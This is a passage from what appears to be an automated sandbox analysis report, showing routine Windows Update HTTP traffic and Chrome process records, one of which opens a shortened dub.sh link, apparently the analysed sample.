                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                          2024-10-23 20:58:18 UTC | 560 | IN | HTTP/1.1 200 OK
                          Cache-Control: no-cache
                          Pragma: no-cache
                          Content-Type: application/octet-stream
                          Expires: -1
                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                          MS-CorrelationId: 062e18ba-0c8f-42c8-9faf-1ad5d267f048
                          MS-RequestId: 91b99a8d-c6f9-4ee7-b90e-e2df7988c7e0
                          MS-CV: SCPQ3cvMCEuECOKM.0
                          X-Microsoft-SLSClientCache: 2880
                          Content-Disposition: attachment; filename=environment.cab
                          X-Content-Type-Options: nosniff
                          Date: Wed, 23 Oct 2024 20:58:17 GMT
                          Connection: close
                          Content-Length: 24490


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.16 | 49718 | 20.12.23.50 | 443
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:56 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                          2024-10-23 20:58:56 UTC | 560 | IN | HTTP/1.1 200 OK
                          Cache-Control: no-cache
                          Pragma: no-cache
                          Content-Type: application/octet-stream
                          Expires: -1
                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                          MS-CorrelationId: 52b449e0-36af-42fe-86cc-457147e5ced4
                          MS-RequestId: 85bd4fee-a48a-40de-bfc5-f4dbf6f13f31
                          MS-CV: b2Cu+JauL0KQPzc6.0
                          X-Microsoft-SLSClientCache: 1440
                          Content-Disposition: attachment; filename=environment.cab
                          X-Content-Type-Options: nosniff
                          Date: Wed, 23 Oct 2024 20:58:55 GMT
                          Connection: close
                          Content-Length: 30005


                          Target ID:0
                          Start time:16:58:03
                          Start date:23/10/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff7f9810000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:1
                          Start time:16:58:03
                          Start date:23/10/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff7f9810000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:2
                          Start time:16:58:04
                          Start date:23/10/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dub.sh/vu352zF"
                          Imagebase:0x7ff7f9810000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly